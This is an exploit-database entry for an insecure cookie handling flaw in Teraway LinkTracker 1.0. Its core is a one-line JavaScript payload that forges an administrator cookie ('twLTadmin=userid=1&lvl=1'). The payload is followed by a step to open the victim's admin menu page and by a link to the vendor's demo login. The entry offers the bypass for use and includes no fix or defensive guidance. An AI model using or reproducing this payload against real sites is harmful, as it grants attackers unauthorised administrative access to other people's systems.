id: 5108
date: 04/26/2009
title: Teraway LinkTracker 1.0 Insecure Cookie Handling Vulnerability
author: ThE g0bL!N
cves: 

==============================================================
Teraway LinkTracker 1.0 Insecure Cookie Handling Vulnerability
==============================================================


-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway LinkTracker V1.0
-------------------------------------
Teraway LinkTracker V1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------

javascript:document.cookie="twLTadmin=userid=1&lvl=1;path=/";
Then Go to  http://victim/path/menu.asp

demo
----
http://www.teraway.com/linktracker/demo/login.asp


--------------------------------------------------



#  0day.today [2023-03-22]  #